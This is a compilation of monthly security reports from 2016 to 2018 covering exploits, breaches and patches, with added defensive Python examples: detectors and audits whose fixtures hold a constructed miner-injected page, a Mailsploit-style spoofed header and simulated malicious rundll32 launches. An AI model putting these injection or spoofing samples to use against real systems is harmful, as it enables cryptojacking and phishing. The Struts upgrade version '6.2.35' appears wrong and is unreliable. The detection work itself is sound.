Our monthly Information Security Report includes a summary of security breaches, threats and vulnerabilities. It is designed to help you gain visibility over the latest events and to help you assess their implication on your environment.

Information Security Report | September 2018


The Information Security Report is a monthly summary, compiled by Shearwater’s experienced cybersecurity professionals, to highlight the vulnerabilities and new attack vectors in some of the latest active threats, exploits and breaches and share recommendations to help you protect your data and stay a step ahead.

This month features a serious vulnerability in a number of HP printer/fax combinations, a new twist on exploiting MikroTik routers to mine crypto currency, a critical Apache Struts code vulnerability that doesn’t require installed plugins, details of the Reddit 2007 backup database breach, Google’s forthcoming plans to block the injection of third-party code into their browser processes and how to get free replacement Symantec certificates to avoid Firefox untrusted certificate warnings.

Current Threats and Exploits


  • HP Printer/Fax Combo Vulnerabilities:
    Security researchers have discovered a serious vulnerability in a number of HP printer/fax combination units. The vulnerability allows a remote attacker to take control of the device by exploiting a flaw in the built-in fax modem. The only prerequisites for the attack are that the printer is connected to a phone line and that the adversary knows the device’s fax number, which makes the vulnerability especially suitable for targeted attacks. Once an attacker has gained control of the device, they are able to pivot to its LAN interface and launch attacks into the internal network the printer is connected to. During a demonstration, the researchers who found the vulnerability used the printer to launch the EternalBlue exploit against computers on the same LAN as the printer.
    HP has released patches for the affected devices and it is strongly recommended that you check for updates if you use an HP printer/fax combination device. If you do not use the fax component of the device, disconnect it from the phone line to reduce the attack surface. (1)
  • Crypto Currency Mining Code Dynamically Injected into Browsing Sessions:
    Attackers have used a well-known exploit to compromise over 200,000 MikroTik routers and put them to work for crypto currency mining. The attack, however, proceeded differently from the usual. Instead of using the routers themselves to mine crypto currency, the attackers used them to dynamically inject the Coinhive mining JavaScript into HTTP sessions passing through the router. Users downstream of a compromised router therefore received the mining code and generated revenue for the attacker. Additionally, if web servers sat behind an affected router, the mining code was injected into every HTTP page the server delivered. To make matters worse, the affected routers included ISP-grade routers, greatly increasing the number of affected users. It is important to note that only HTTP sites are affected, as the router is unable to inject code into encrypted HTTPS sessions.
    It is recommended that all users of MikroTik routers ensure they have the latest patches installed. (2)
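As an added example (not from the original report or from Shearwater), the check below is one a site owner could run against a page fetched through a suspect network path: it parses the HTML, lists every external script host that is not on the site’s own allowlist, and flags inline scripts carrying a miner marker. The two sample pages, the trusted-host list and the marker strings are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed signature list: strings a Coinhive-style inline loader contains.
# Extend it with whatever your own telemetry has seen.
MINER_MARKERS = ("CoinHive", "coinhive.min.js")


class ScriptCollector(HTMLParser):
    """Collect <script src=...> references and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute values
        self.inline = []     # inline script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit_scripts(html, trusted_hosts):
    """Return (reason, detail) pairs for scripts that do not belong on the page.

    Relative script URLs are same-origin and therefore treated as trusted;
    absolute URLs must point at a host in trusted_hosts.
    """
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlsplit(src).hostname
        if host and host.lower() not in trusted_hosts:
            findings.append(("untrusted-script-host", host.lower()))
    for body in parser.inline:
        if any(marker in body for marker in MINER_MARKERS):
            findings.append(("inline-miner-marker", body.strip()[:40]))
    return findings


# Constructed sample: the page as the origin server sends it ...
CLEAN_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
<script>window.appConfig = {"lang": "en"};</script>
</head><body><p>hello</p></body></html>"""

# ... and the same page after an on-path router has appended a miner loader.
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
    "<script>var m = new CoinHive.Anonymous('SITE_KEY'); m.start();</script>"
    "</body>",
)

TRUSTED_HOSTS = {"www.example.com", "cdn.example.com"}  # constructed allowlist

if __name__ == "__main__":
    print("clean page:   ", audit_scripts(CLEAN_PAGE, TRUSTED_HOSTS))
    print("injected page:", audit_scripts(INJECTED_PAGE, TRUSTED_HOSTS))
```

Serving the site over HTTPS (with HSTS so browsers do not fall back to HTTP) removes the injection point the report describes, since the router cannot modify an encrypted stream; the audit is useful for whatever HTTP pages remain.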
  • Another Critical Apache Struts Remote Code Execution Vulnerability:
    Apache has announced another critical remote code execution vulnerability in its Struts framework. The vulnerability exists in the Struts core itself and is therefore exploitable without any installed plugins. Additionally, the attack can be performed without authenticating to the page, and it is thought to be very easy for an attacker to determine whether a page is vulnerable.
    Apache Struts users are advised to update to version 6.2.35 or 2.5.17 as soon as possible to mitigate the vulnerability. (3)

Recent Breaches


  • Old Reddit Data Exposed:
    Reddit released a statement advising users that it suffered a data breach earlier in the month. According to the statement, the attacker gained access to a backup of the 2007 database containing usernames and salted passwords. While the system was protected by SMS two-factor authentication, the attacker was able to capture the second factor through an SMS intercept.
    Users whose data was exposed have been sent an email from Reddit with instructions on the next steps they need to take. Reddit has changed its second-factor authentication method to a token-based one and is recommending that all its users do the same. (4)

Other News


  • Google Chrome to Block Third Party Code Injection:
    A number of anti-virus vendors follow the practice of injecting their own code into web browser processes to add their own protection against malicious sites. This often allows them to restrict the categories of websites users can visit and to scan pages for malware. While this code injection is intended to make browsing more secure, it is not officially supported by the browser manufacturers and can make the browser unstable. In response, Google has announced that after a browser crash it will begin notifying users of any other software injecting code into the browser process. Additionally, Google has announced that future versions of Chrome will outright block the injection of third-party code into their browser processes. It is currently not known what impact (if any) this will have on the overall security of web browsing with Chrome, and the feature is still in a trial rollout phase. Google will provide additional information in the coming months. (5)
  • Browsers to Distrust Symantec TLS Certificates:
    The nightly build of Firefox version 63 now shows an untrusted certificate warning for certificates issued by Symantec. All Symantec-issued certificates are distrusted, including those from subsidiary certificate authorities such as Thawte, GeoTrust and RapidSSL. It is recommended that website administrators replace certificates issued by the above certificate authorities as soon as possible. DigiCert (which has taken over the issuance of Symantec certificates) is offering a replacement certificate at no additional cost to the administrator. Updating the certificate ensures users are not presented with the invalid certificate warning page when visiting your site. Website admins should obtain new certificates no later than October 2018, when the change is planned to reach the mainstream versions of both Firefox and Google Chrome. (6)

References

Information Security Report – March 2018


Current Threats and Exploits


  • Crypto Miners Are Sneaking Into Your Networks – Despite dropping off a little in the news this month, crypto currency is still a much sought-after commodity for many. Attackers are looking to cash in on this and will do anything possible to make use of your idle CPU time. In the past we have seen malware, advertising, worms and phishing campaigns aiming to deploy mining scripts or software on unsuspecting victims. It was recently reported that a large number of websites around the world were hijacked with crypto mining scripts as a result of a compromised plugin script. Users visiting those sites were made to execute Coinhive mining scripts for the attacker. Although this method is also used by advertisers to monetise sites, the incident highlighted the importance of knowing your online supply chain (and where you get your web resource scripts from).
  • Shortened URLs in Phishing – It has been observed in the wild that shortened URLs are increasingly being used again by active phishing campaigns. As a result, one of the core user awareness points for phishing, looking at the link, is bypassed, as most users recognise and trust shortened-URL services (such as Google’s and Bitly). Typically seen in campaigns targeting webmail credentials, this attack vector poses a significant risk to organisations and emphasises the importance of web content filtering. It is also recommended that users are made aware of this type of activity and told to be on the lookout for it.
  • Memcached Denial of Service Attacks – A huge number of denial of service attacks are being staged from misconfigured internet-facing memcached servers. These servers accept easily forged UDP packets, which makes them perfect for reflected and amplified denial of service attacks. As this service was not designed to be exposed to the internet, it is unlikely that any additional security has been configured; the remediation is to firewall off the service from the internet.
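As an added example (not part of the original report), the audit below parses a memcached start-up command line and reports the two settings behind the reflection problem: a UDP listener (memcached’s -U flag; -U 0 disables it) and a bind address that exposes the daemon on every interface (-l). It assumes the older memcached behaviour, where UDP is enabled unless -U 0 is given; the sample command lines are constructed.

```python
import shlex

# memcached listens for UDP on 11211 unless told otherwise (assumption: the
# pre-1.5.6 default, which is the configuration the reflection attacks abuse).
DEFAULT_UDP_PORT = 11211
ANY_ADDRESS = {"0.0.0.0", "::", "*"}


def _option(args, flag):
    """Return the value of the last occurrence of flag, accepting '-U 0' and '-U0'."""
    value = None
    i = 0
    while i < len(args):
        arg = args[i]
        if arg == flag:
            if i + 1 < len(args):
                value = args[i + 1]
            i += 2
            continue
        if arg.startswith(flag) and len(arg) > len(flag):
            value = arg[len(flag):]
        i += 1
    return value


def audit_memcached_cmdline(cmdline):
    """Return (finding, detail) pairs for one memcached command line; [] is clean."""
    args = shlex.split(cmdline)
    findings = []

    udp = _option(args, "-U")
    udp_port = DEFAULT_UDP_PORT if udp is None else int(udp)
    if udp_port != 0:
        findings.append(("udp-enabled", udp_port))

    listen = _option(args, "-l")
    if listen is None:
        # No -l at all means memcached binds every interface.
        findings.append(("listens-on-all-interfaces", "no -l given"))
    else:
        exposed = sorted({a.strip() for a in listen.split(",")} & ANY_ADDRESS)
        if exposed:
            findings.append(("listens-on-all-interfaces", ",".join(exposed)))
    return findings


# Constructed command lines: the exposed default and a hardened one.
EXPOSED = "memcached -d -m 64 -u memcache"
HARDENED = "memcached -d -m 64 -u memcache -l 127.0.0.1 -U 0"

if __name__ == "__main__":
    for label, cmd in (("exposed", EXPOSED), ("hardened", HARDENED)):
        print(f"{label}: {audit_memcached_cmdline(cmd) or 'no findings'}")
```

The report’s remediation (block the service at the firewall) still applies regardless of what the audit says: the check only tells you whether the daemon itself is offering a UDP listener on a reachable address, not whether anything in front of it is filtering.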

Read more on SANS ISC InfoSec Forums

Recent Breaches


  • Unsecured AWS Once Again Makes News – Poorly secured AWS S3 buckets continue to be a problem. Researchers notified the LA Times after discovering that one of its unsecured Amazon S3 buckets had been cryptojacked and was mining Monero cryptocurrency. The LA Times had not correctly configured the S3 bucket, and as a result it was publicly writable.

Read more on naked security

Other News


  • Notifiable Data Breaches Scheme Comes into Effect – Australia’s Notifiable Data Breach scheme came into effect this month. This amendment to the Privacy Act requires businesses, under certain conditions, to report data breaches to the Office of the Australian Information Commissioner. It is recommended that all organisations become aware of their responsibilities under these changes and update incident response plans as required to include these potential actions. For additional information please engage with your legal and/or privacy team.

Read more on ZDNet

  • Chrome Will Label HTTP Sites as Not Secure – Starting from July, Google Chrome will label sites visited over HTTP as not secure. This move is intended to increase HTTPS adoption and ensure that sites default to their HTTPS version.

Read more on ars TECHNICA

  • Importance of Multifactor Authentication in the Modern Enterprise – Multifactor authentication is a practical way to add security to the logon process by requiring additional forms of identification on top of the username/password sequence. As the number of password exploits continues to increase, enterprises should look into the available multifactor tools and integrate them into their infrastructure to secure logins and access to resources.
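As an added example that serves both the Reddit item above (SMS codes intercepted, token-based second factor recommended) and this multifactor item, the code below implements the token algorithm authenticator apps use: HOTP (RFC 4226) and its time-based form TOTP (RFC 6238), plus a verifier that tolerates one step of clock drift and compares in constant time. This is illustrative code, not Shearwater’s or any vendor’s; the shared secret used here is the RFCs’ published test key.

```python
import hmac
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6, algo: str = "sha1") -> str:
    """RFC 4226: HMAC over the big-endian counter, dynamic truncation, mod 10^digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % 10 ** digits).zfill(digits)


def totp(secret: bytes, digits: int = 6, step: int = 30, now=None) -> str:
    """RFC 6238: HOTP with the counter derived from the current time window."""
    if now is None:
        now = int(time.time())
    return hotp(secret, int(now) // step, digits)


def verify_totp(secret: bytes, submitted: str, now=None,
                window: int = 1, digits: int = 6, step: int = 30) -> bool:
    """Accept the code for the current window or up to `window` steps either side.

    Every candidate is compared with hmac.compare_digest and the loop never
    exits early, so the time taken does not reveal which digits matched.
    """
    if now is None:
        now = int(time.time())
    counter = int(now) // step
    ok = False
    for delta in range(-window, window + 1):
        if hmac.compare_digest(hotp(secret, counter + delta, digits), submitted):
            ok = True
    return ok


# The test key from RFC 4226 / RFC 6238 (20 ASCII bytes). In a real deployment
# the secret is generated per user and shared once, usually as a base32 QR code.
RFC_TEST_SECRET = b"12345678901234567890"

if __name__ == "__main__":
    code = totp(RFC_TEST_SECRET, now=59)
    print("code at T=59:", code)
    print("verifies:", verify_totp(RFC_TEST_SECRET, code, now=59))
```

Because the code is derived from a secret that never leaves the user’s device and the server, there is no message in transit for an SMS intercept to capture; the remaining risks are the secret’s storage on both ends and phishing of the code itself, which is why the verifier also refuses codes outside the drift window.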

Read more on Search Security

Information Security Report – February 2018


Over the past month, we have seen a number of threats, vulnerabilities, and spear phishing attacks affecting organisations worldwide. Read on for a summary of these events to help you assess their implication on your environment.

Current Threats and Exploits


  • Refined Exploits Targeting Legacy Windows Servers and PCs: The vulnerabilities discovered in SMBv1 servers (CVE-2017-0146 and CVE-2017-0143) can be used by remote attackers to execute arbitrary code on Microsoft SMB servers via crafted packets. Three exploits linked to these Microsoft vulnerabilities have been rewritten and stabilised and can now impact all Windows operating systems from Windows 2000 up to and including Server 2016. It is highly recommended to apply all available software patches, as these exploits are reported to be used by worm malware to spread. Additional details on the recommended actions against these exploits can be found in the references below. (1)
  • WannaMine: Cryptocurrency Mining Malware: An EternalBlue-based malware dubbed WannaMine was discovered using the computing resources of infected systems to mine cryptocurrency. The malware first uses the password harvesting kit Mimikatz to steal usernames and passwords from system memory, then uses the EternalBlue exploit to spread around the network. (2)(3)
  • Cisco ASA Remote Code Execution and Denial of Service Vulnerability: A vulnerability in the SSL VPN functionality of the Cisco ASA was discovered and is being actively scanned for and attacked across the internet. Successful attacks allow the attacker to reload the device, resulting in a denial of service, or to run arbitrary code on the device by sending crafted XML packets to the WebVPN interface. Users of Cisco ASA devices are recommended to check the running operating system version and upgrade as soon as possible. (4)
  • Cisco IOS and IOS XE Software EnergyWise Denial of Service Vulnerabilities: Multiple vulnerabilities in the EnergyWise module of Cisco IOS and Cisco IOS XE Software have been disclosed. These are caused by the improper parsing of crafted EnergyWise packets destined for an affected device. These vulnerabilities could allow an unauthenticated, remote attacker to cause a buffer overflow condition or a reload of an affected device, leading to a denial of service (DoS) condition. Cisco has released software updates that address these vulnerabilities. (5)
  • Lenovo Networking OS Backdoor: A backdoor that has existed since 2004 has been removed from the Lenovo Networking OS used by 16 IBM and 16 Lenovo network switches. The backdoor allows administrative access to the device; Lenovo claims it was placed in the product by the now-defunct Nortel Networks. (6)
  • Cisco ASR 9000 IPv6 Fragmented Packet Denial of Service: Due to incorrect handling of IPv6 packets in the Cisco ASR 9000 series, an unauthenticated attacker can cause a reload of Trident line cards in routers running Cisco IOS XR Software Release 5.3.4 with IPv6 configured. Cisco has released software updates that resolve this issue. (7)(8)

Recent Breaches


  • Russian Hackers Published 2018 Winter Olympics Emails: It is reported that Russian hackers calling themselves ‘Fancy Bear’ have retaliated against the banning of Russia from the Winter Olympics by releasing emails regarding the Olympic Games scheduled for February in South Korea. It is alleged that the group is associated with military intelligence. The International Olympic Committee has not commented on the allegations raised by the leaked documents. (9)

Other News


  • Netflix Phishing Campaign: A phishing campaign was reported to hijack the Netflix brand, tricking users into handing over their login details, credit card details, a mugshot and their ID. The fraudsters used a fake website with a valid HTTPS certificate to reassure users of the legitimacy of the site. (10)

References

Information Security Report – January 2018


Current Threats and Exploits


  • Meltdown? Spectre? Where Can We Find Out More? – Early January saw the industry start the year with a bang as rumours of an Intel bug were released online. Google’s Project Zero quickly announced on 3 January that nearly all modern processors are affected by a vulnerability that, when exploited, can allow potentially sensitive information to be read from memory across local security boundaries. A combined response from processor and operating system vendors is currently underway, with most vendors releasing a statement or patch where applicable. It is recommended that local administrators investigate their organisation’s exposure to the bug and begin a remediation plan where possible. Additional detail and vendor responses can be found in the references below. (1, 2, 3, 4)
  • Risks Created by Bitcoin’s Surge in Popularity – Driven by the rise in the value of bitcoin in recent months, crypto currency has become a hot topic for those in and out of the IT space. With a large number of people newly curious or looking to make some quick money in crypto markets, scammers and attackers have also been thinking about how they can leverage the new-found popularity of these currencies. In recent months there has been an increase in bitcoin-related phishing and online scams attempting to steal bitcoin or wallet private keys and passwords from unsuspecting users.

Recent Breaches


  • Forever 21 POS Malware Is a Reminder to Encrypt Data at Rest – Retailer Forever 21 announced that for 7 months last year a number of cash register and point of sale devices were infected with malware that was able to swipe payment card details. In addition, the malware was reported to be present on some systems where it was able to read transaction logs on a central server that were generated by non-compromised devices. It has been confirmed that encryption on these devices was not always enabled, and during periods when it was not enabled the logs could be read by the malware, which would search them for payment card details. Although POS malware is a constant threat, it is also important to ensure you are aware of all systems in your organisation that hold or process any form of payment card information. Regular testing and quality control of measures such as encryption of data at rest and reduction of sensitive information in logs can ensure that, in the event of a compromise, the malware is not able to find sensitive information. (8)
  • Leaky (S3) Buckets at It Again – Once again, a publicly exposed Amazon S3 bucket containing sensitive information was found. This time it contained details on an estimated 123 million American households. With more companies using cloud services for storage and business, it is important to gain a good understanding of the access controls in place for data kept in the cloud. Regular reviews of access to your cloud services and data are also recommended. If you are looking for more information about securing S3, see this article here. (9)

Other News


  • What to Expect in 2018 – With 2017 teaching us all some new lessons about patch management, ransomware, crypto currencies and securing the cloud, it is expected that 2018 will provide a similar education. With more companies looking to invest in the cloud and in new technologies, there is an increased need to consider how we can better secure the modern business. The internet of things, and the issues these devices have faced in the past, is a constant reminder of this. Further, it is expected that financially motivated cybercrime will remain a constant threat through social engineering/phishing, crypto-currency targeted malware and possibly more organisation-specific ransomware. From a defender’s perspective, it is expected that the use of two factor authentication (2FA) will increase significantly. As many credential-based attacks can be mitigated by enabling 2FA, and with 2FA gaining widespread support (especially in the cloud and online services), 2018 should see a welcome increase in 2FA uptake. (10)

References

Information Security Report – December 2017


Over the past month, we have seen a number of threats, vulnerabilities, and spear phishing attacks affecting organisations worldwide. Read on for a summary of these events to help you assess their implication on your environment.

Threats and Exploits


Mailsploit

Mailsploit Allows Spoofed Mails to Fool DMARC. Mailsploit is a collection of vulnerabilities in various email clients which allow an attacker to perform code injection attacks, spoof senders and bypass email protection mechanisms such as DMARC (DKIM/SPF). The security researcher who developed Mailsploit described how it allows an attacker to send emails from any address they choose by taking advantage of how servers validate the DKIM signature of the original domain and not the spoofed one. It has been reported that this technique is currently not detected or blocked by the majority of mail client vendors.

All major email client and webmail vendors were notified about Mailsploit prior to its public release; however, a large number of popular clients still remain vulnerable.

The list of impacted mail clients can be found here >>

It is recommended that users update their email client whenever a software update is available, use end-to-end encrypted messaging for personal conversations and at work, and/or use PGP/GPG to verify identities and encrypt email contents.

You can read more on Mailsploit on info security magazine and mailsploit.com
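As an added example (not from the report or from the Mailsploit author), the check below covers one class of header tricks Mailsploit relied on: RFC 2047 encoded-words in the From header that decode to control characters and a second, convincing-looking address, so that a client displays one sender while DKIM/SPF were evaluated against the real one. It decodes the header with the standard library and flags control characters, more than one address after decoding, and a mismatch between the domain a truncating client would display and the domain the mail server actually saw. The sample headers are constructed.

```python
import re
from email.header import decode_header

ENCODED_WORD = re.compile(r"=\?[^?]+\?[BbQq]\?[^?]*\?=")
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def decode_from(raw_from):
    """Decode every RFC 2047 encoded-word in a raw From header value."""
    parts = []
    for chunk, charset in decode_header(raw_from):
        if isinstance(chunk, bytes):
            chunk = chunk.decode(charset or "ascii", errors="replace")
        parts.append(chunk)
    return "".join(parts)


def actual_domain(raw_from):
    """Domain of the address as a mail server sees it: the text after the last
    '@' that sits outside any encoded-word."""
    plain = ENCODED_WORD.sub("", raw_from)
    if "@" not in plain:
        return ""
    return plain.rsplit("@", 1)[-1].strip(" >\t").lower()


def check_from_header(raw_from):
    """Return a list of finding names for a raw From header ([] = nothing odd)."""
    findings = []
    decoded = decode_from(raw_from)

    if CONTROL_CHARS.search(decoded):
        findings.append("control-chars")
    if decoded.count("@") > 1:
        findings.append("multiple-addresses")

    # What a client that stops rendering at the first control character shows.
    shown = CONTROL_CHARS.split(decoded, maxsplit=1)[0]
    if "@" in shown:
        shown_domain = shown.rsplit("@", 1)[-1].strip(" >\t").lower()
        if shown_domain != actual_domain(raw_from):
            findings.append("domain-mismatch")
    return findings


# Constructed headers: two legitimate senders and one Mailsploit-style spoof.
PLAIN = '"Alice Example" <alice@example.com>'
ENCODED_NAME = "=?utf-8?Q?Jos=C3=A9_Example?= <jose@example.com>"
SPOOF = "=?utf-8?Q?ceo=40corp-example=2Ecom=00?=@attacker.example"

if __name__ == "__main__":
    for header in (PLAIN, ENCODED_NAME, SPOOF):
        print(repr(header), "->", check_from_header(header) or "ok")
```

The third header passes DKIM and SPF for attacker.example, which is exactly the report’s point: the checks are correct, the display is what lies. Running the check at the gateway, before the client renders anything, is where it belongs.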

Spear Phishing

Huge Increase in Email Impersonation Attacks: According to the Email Security Risk Assessment (ESRA) report released by Mimecast Data Security, although organisations continue to face an ongoing threat from malware, the fastest growing threat is impersonation attacks. An organisation is seven times more likely to be hit by an impersonation attack than by email-borne malware. These attacks, also known as whaling or spear phishing, trick recipients into wiring money to the fraudster. They are highly targeted and often carried out after a cybercriminal has gathered enough information to send the right person the right message. These attacks continue to grow faster than malware because they are very hard for traditional defences like email filters to detect.

Good user training will give an edge in avoiding most of these payment and impersonation scams. A few other tips for security teams to help combat the social engineering threat include:

  • Conducting internal phishing exercises against your own employees and sharing the results with them so that they learn what to look out for. This should be combined with good training on how users can detect phishing emails.
  • Impersonation attacks often try to mimic emails from C-level executives. Implement a company policy that closes scam avenues for would-be spear phishers (e.g., never request the sharing of sensitive documents via email).
  • Disable links inside email bodies to force users to manually navigate to the site mentioned in the email. It adds extra steps, but it can prevent a user from clicking on a phishing link by accident.

Read more on info security magazine and TechRepublic

Breaches


Virtual Keyboard App Data Breach

Massive Breach Exposes Keyboard App That Collects Personal Data on Its 31 Million Users. A team of security researchers discovered a huge trove of personal data belonging to users of the virtual keyboard app ‘AI.type’ that was accidentally leaked online for anyone to download. The app customises the on-screen keyboard on mobile phones and tablets and has more than 40 million users worldwide. It is reported that the app requests ‘full access’ to all user data stored on the phone and appears to collect everything from contacts to keystrokes. The leaked data includes full names, phone numbers, email addresses, device information (device name, screen resolution, model details, Android version, mobile network name), country of residence, GPS location and even links and information associated with social media profiles.

Events such as this raise the question of what permissions mobile applications have on our devices (and just how much access these applications NEED). To best protect yourself against this form of application privilege abuse, always read and be cautious about what access is granted to applications.

Read more on The Hacker News

Uber Technologies Data Breach

Personal data of 57 million customers and drivers was stolen last year from ride-sharing company Uber, and the breach was revealed to have been concealed by the company for more than a year. It is suggested that the company paid $100,000 to the attackers. The company, however, advised that no social security numbers, credit card information, trip location details or other data were taken. Uber is being condemned for how it chose to deal with the issue after discovering the attack and has also been sued for negligence over the breach by a customer.

It is reported that two attackers were able to retrieve login credentials from a private GitHub repository, which they used to access Uber data in an Amazon Web Services account, where they discovered customer and driver information. Although state and federal laws in the United States require companies to alert people and government agencies when sensitive data breaches occur, Uber failed to comply.

Read more on Bloomberg.com

Breach at PayPal Subsidiary Affects 1.6 Million Customers. PayPal disclosed on 1 December 2017 a data breach at its recently acquired company TIO Networks. Personal information for 1.6 million individuals may have been compromised. TIO is based in Canada and serves some of the largest telecom and utility network operators in North America. PayPal pointed out that the PayPal platform has not been impacted, as the TIO systems have not been integrated into its own platform. PayPal advised that affected companies and individuals would be contacted by mail and email and offered free credit monitoring via Experian. The breach was discovered as part of ongoing investigations to identify vulnerabilities in the processing platform.

Read more on SecurityWeek.com

Other News


Simulated Attacks Uncover Real-World Problems in IT Security. A research report by SafeBreach, a cybersecurity company that has developed a platform simulating hacker breach methods, reveals that virtual hackers “have a 60% success rate of using malware to infiltrate networks. And once in, the malware could move laterally almost 70% of the time. In half the cases, they could exit networks with data.” The research found that it was not hard to get past the perimeter, and once in, it was easy for attackers to move around and exfiltrate data. This is because most organisations overlook lateral movement and focus mostly on the perimeter.

According to the report, malware infiltration methods like nesting or “packing” malware executables were effective in bypassing security controls 50% of the time. The success rate of infiltrating a network using packed executables was found to be 55%-61% when using JavaScript, VBScript (VBS) over HTTP and the compiled HTML (CHM) file format. It is recommended that network security controls be configured to scan for malicious files and block them before they reach the endpoints/hosts and are installed to disk. The report further outlines how cybercriminals exfiltrate data using the easiest methods, which are often traditional clear or encrypted web traffic. The ports with the highest exfiltration success rate include port 443 (HTTPS) and port 123 (NTP).

It is recommended that, to better protect resources, organisations optimise their current security solutions, constantly update configurations as needed, and then test the changes they make.

Read more on DARKReading.com

December 2016 Internet Security Report


Merry Christmas and a Happy New Year! December 2016 was full of the usual phishing, malvertising, weak security of IoT devices and large breaches of user accounts that the rest of the year had delivered. If you have a Yahoo email account, or an email service that is run through Yahoo’s mail service, please change your passwords for those accounts and consider moving to another provider, as Yahoo has had two major publicly disclosed breaches in 2016 alone.

If you are still thinking of a new year’s resolution, please consider “changing your passwords to passphrases”.

Threats

Breaches

  • Yahoo disclosed in December that there was another breach, separate from the one disclosed earlier in the year. In this newly disclosed breach, the thieves stole the data of more than a billion user accounts. Yahoo states that for “potentially affected accounts, the stolen user account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (using MD5) and, in some cases, encrypted or un-encrypted security questions and answers.”
    If you have a Yahoo account please change your password for this account. If you have used your Yahoo account password for anything else, please change that password too.
    https://krebsonsecurity.com/2016/12/yahoo-one-billion-more-accounts-hacked/

Patches and Updates

November 2016 Internet Security Report


The ransomware threat continued to thrive with new variants, payloads and even social media as a delivery platform. A vulnerability in a German ISP’s routers caused havoc in late November, with almost 1 million users knocked offline as a result of a recent increase in Mirai worm activity. Social engineering was brought into the spotlight again as the hospitality industry was targeted through customer service channels to compromise payment systems. Data breaches also got their fair share of coverage in November, with credit card information stolen and the insider threat re-emerging to create headaches.

Threats

  • The ransomware threat continues to bother internet users, with a new Locky variant using the .zzzzz extension. This variant was first seen in late November and is delivered through Office documents (mainly .xls and .docm) containing an encrypted .dll payload that is decrypted, dropped into the user’s /temp/ directory and executed by rundll32. This differs from other variants of the ransomware, which typically used macro-embedded documents to retrieve the payload from the internet before executing it. The threat can be better mitigated by ensuring that AV is up to date and, where possible, that controls are in place to stop the execution of files from the /temp/ directory. Further, as most of these new variants are delivered in emails from spoofed addresses, it is a reminder to review your domains’ and email servers’ SPF records and policies.
  • November saw the re-introduction of social media messaging as a way to compromise users through malicious image attachments containing ransomware. Dubbed ‘ImageGate’ by researchers at Check Point, the attack uses Facebook and LinkedIn messaging services to spam and compromise users with Locky ransomware at scale. It leverages the trust of your social media friends and contacts to lure users into clicking on seemingly harmless files. The issue has since been patched; however, this serves as a reminder to always think before you click and, when in doubt, ask.
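As an added example (not from the original report), the detection below runs over process-creation records and flags the behaviour described for this Locky variant: rundll32 loading a DLL from a temp directory, with the parent process being an Office application as a second signal. The log format (timestamp|parent|image|command line) and the sample events are constructed; map the fields from your own EDR or Sysmon process-creation data.

```python
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
TEMP_PATH = re.compile(r"\\temp\\", re.IGNORECASE)     # any ...\Temp\... component
FIRST_TOKEN = re.compile(r'\s*(?:"[^"]*"|\S+)\s*')      # the executable itself


def rundll32_target(cmdline):
    """Extract the DLL path from 'rundll32.exe <dll>,<entry>' (quoted or not)."""
    rest = FIRST_TOKEN.sub("", cmdline, count=1)
    return rest.split(",", 1)[0].strip().strip('"')


def parse_events(text):
    """Parse constructed 'timestamp|parent|image|cmdline' lines into dicts."""
    events = []
    for line in text.strip().splitlines():
        ts, parent, image, cmdline = line.split("|", 3)
        events.append({"ts": ts, "parent": parent, "image": image, "cmdline": cmdline})
    return events


def suspicious_rundll32(events):
    """Return (timestamp, [reasons]) for rundll32 launches worth an alert."""
    hits = []
    for ev in events:
        if ev["image"].lower() != "rundll32.exe":
            continue
        reasons = []
        if TEMP_PATH.search(rundll32_target(ev["cmdline"])):
            reasons.append("dll-loaded-from-temp")
        if ev["parent"].lower() in OFFICE_APPS:
            reasons.append("spawned-by-office-app")
        if reasons:
            hits.append((ev["ts"], reasons))
    return hits


# Constructed process-creation records (timestamp|parent|image|command line).
SAMPLE_EVENTS = r"""
2016-11-28T09:41:03Z|explorer.exe|EXCEL.EXE|"C:\Program Files\Microsoft Office\Office15\EXCEL.EXE" C:\Users\bob\Downloads\invoice.xls
2016-11-28T09:41:27Z|EXCEL.EXE|rundll32.exe|rundll32.exe C:\Users\bob\AppData\Local\Temp\x9k2.dll,qwerty
2016-11-28T09:50:10Z|svchost.exe|rundll32.exe|rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL
2016-11-28T10:02:44Z|cmd.exe|rundll32.exe|rundll32.exe "C:\Windows\Temp\setup.dll",Run
"""

if __name__ == "__main__":
    for ts, reasons in suspicious_rundll32(parse_events(SAMPLE_EVENTS)):
        print(ts, ", ".join(reasons))
```

The third record (shell32.dll from System32) is the everyday legitimate use of rundll32 and produces no alert, which is the point of matching on the DLL location rather than on rundll32 itself; an execution-prevention rule for the temp directory, as the report recommends, stops the same case before it needs detecting.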

Read More
http://thehackernews.com/2016/11/facebook-locky-ransomware.html
http://www.csoonline.com/article/3143173/security/malicious-images-on-facebook-lead-to-locky-ransomware.html

